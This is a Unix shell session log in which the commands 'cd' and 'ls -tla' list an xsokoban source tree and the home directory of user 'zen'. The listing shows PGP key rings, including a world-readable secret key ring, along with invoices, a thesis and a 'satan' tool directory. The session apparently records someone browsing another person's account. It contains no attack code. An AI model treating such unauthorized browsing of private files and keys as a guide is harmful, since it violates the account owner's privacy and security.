-rw-r--r-- 1 zen 14835 Mar 11 1994 scoredisp.c
-rw-r--r-- 1 zen 13906 Mar 11 1994 score.c
drwxr-sr-x 2 zen 512 Mar 11 1994 saves
-rw-r--r-- 1 zen 3881 Mar 11 1994 save.c
-rw-r--r-- 1 zen 1912 Mar 11 1994 resources.c
-rw-r--r-- 1 zen 2395 Mar 11 1994 globals.h
-rw-r--r-- 1 zen 1279 Mar 11 1994 help.h
-rw-r--r-- 1 zen 8334 Mar 11 1994 main.c
-rw-r--r-- 1 zen 1595 Mar 11 1994 options.h
-rw-r--r-- 1 zen 50 Mar 11 1994 patchlevel.h
-rw-r--r-- 1 zen 20276 Mar 11 1994 play.c
-rw-r--r-- 1 zen 3426 Mar 11 1994 externs.h
-rw-r--r-- 1 zen 2551 Mar 11 1994 errors.h
-rw-r--r-- 1 zen 18923 Mar 11 1994 display.c
-rw-r--r-- 1 zen 386 Mar 11 1994 defaults.h
-rw-r--r-- 1 zen 1200 Mar 11 1994 config_local.h
-rw-r--r-- 1 zen 3086 Mar 11 1994 config.h
drwxr-sr-x 3 zen 512 Mar 11 1994 bitmaps
-rw-r--r-- 1 zen 2964 Mar 11 1994 README
-rw-r--r-- 1 zen 58916 Mar 11 1994 libXpm.a
-rw-r--r-- 1 zen 369 Mar 11 1994 Imakefile
-rw-r--r-- 1 zen 4750 Mar 11 1994 FILES
-rw-r--r-- 1 zen 370 Mar 11 1994 Makefile
-rw-r--r-- 1 zen 5934 Mar 11 1994 MANIFEST
wet% cd ../nfs
../nfs: No such file or directory
wet% ls -tla
total 339
drwxr-sr-x 3 zen 512 Nov 25 21:02 ..
drwxr-sr-x 6 zen 1024 Mar 11 1994 .
-rwx------ 1 zen 114688 Mar 11 1994 a.out
-rw-r--r-- 1 zen 7207 Mar 11 1994 xpmP.h
-rw-r--r-- 1 zen 12048 Mar 11 1994 xpm.h
-rw-r--r-- 1 zen 2111 Mar 11 1994 Makefile.bak
-rw-r--r-- 1 zen 7271 Mar 11 1994 xsokoban.man
drwxr-sr-x 2 zen 2048 Mar 11 1994 screens
-rw-r--r-- 1 zen 1494 Mar 11 1994 screen.c
drwxr-sr-x 2 zen 512 Mar 11 1994 scores
-rw-r--r-- 1 zen 14835 Mar 11 1994 scoredisp.c
-rw-r--r-- 1 zen 13906 Mar 11 1994 score.c
drwxr-sr-x 2 zen 512 Mar 11 1994 saves
-rw-r--r-- 1 zen 3881 Mar 11 1994 save.c
-rw-r--r-- 1 zen 1912 Mar 11 1994 resources.c
-rw-r--r-- 1 zen 2395 Mar 11 1994 globals.h
-rw-r--r-- 1 zen 1279 Mar 11 1994 help.h
-rw-r--r-- 1 zen 8334 Mar 11 1994 main.c
-rw-r--r-- 1 zen 1595 Mar 11 1994 options.h
-rw-r--r-- 1 zen 50 Mar 11 1994 patchlevel.h
-rw-r--r-- 1 zen 20276 Mar 11 1994 play.c
-rw-r--r-- 1 zen 3426 Mar 11 1994 externs.h
-rw-r--r-- 1 zen 2551 Mar 11 1994 errors.h
-rw-r--r-- 1 zen 18923 Mar 11 1994 display.c
-rw-r--r-- 1 zen 386 Mar 11 1994 defaults.h
-rw-r--r-- 1 zen 1200 Mar 11 1994 config_local.h
-rw-r--r-- 1 zen 3086 Mar 11 1994 config.h
drwxr-sr-x 3 zen 512 Mar 11 1994 bitmaps
-rw-r--r-- 1 zen 2964 Mar 11 1994 README
-rw-r--r-- 1 zen 58916 Mar 11 1994 libXpm.a
-rw-r--r-- 1 zen 369 Mar 11 1994 Imakefile
-rw-r--r-- 1 zen 4750 Mar 11 1994 FILES
-rw-r--r-- 1 zen 370 Mar 11 1994 Makefile
-rw-r--r-- 1 zen 5934 Mar 11 1994 MANIFEST
wet% cd
wet% cd
wet% ls -tla
total 3265
drwxrwsrwx 6 zen 1024 Feb 4 15:35 .
-rw-r--r-- 1 zen 7143 Feb 4 15:35 .bashrc
-rw-r--r-- 1 zen 1110 Feb 4 15:35 .bash_profile
-rw------- 1 zen 25397 Feb 3 23:07 jap
drwxr-sr-x 4 root 512 Feb 3 21:50 ..
-rw-r--r-- 1 root 2333571 Jan 6 00:14 thesis.ps
-rw------- 1 zen 131233 Jan 2 16:06 doc.txt
-rw-rw-rw- 1 zen 0 Dec 31 14:18 .bash_history
-rw------- 1 zen 6254 Dec 22 14:37 polyrules
-rw------- 1 zen 1456 Dec 20 14:37 .muffy-gifts
-rw------- 1 zen 241 Dec 2 17:03 invoice
-rw------- 1 zen 217 Nov 30 11:19 invoice.ps
-rw------- 1 zen 1032 Nov 29 14:16 foobard.foo
drwxr-sr-x 5 zen 512 Nov 25 21:01 src
drwxr-sr-x 2 zen 512 Nov 22 01:40 doc
-rw-r--r-- 1 root 3945 Nov 22 01:40 config.txt
-rwxr-xr-x 1 zen 286720 Nov 22 01:34 pgp262
-r-------- 1 zen 0 Nov 21 20:18 .xnews.wet:0
-rwxr-xr-x 1 zen 163840 Nov 21 16:54 pgptelnet
-rwxr-xr-x 1 zen 253952 Nov 21 14:08 pgp
-rw-r--r-- 1 zen 497 Nov 21 14:07 secring.pgp
-rw-r--r-- 1 zen 10537 Nov 21 14:07 pubring.pgp
drwxr-sr-x 3 zen 512 Mar 11 1994 satan
-rw------- 1 zen 51966 Mar 11 1994 PAPER
-rw------- 1 zen 146 Mar 7 1994 .Xauthority
drwxrwsrwx 2 zen 512 Feb 16 1994 .wastebasket
wet%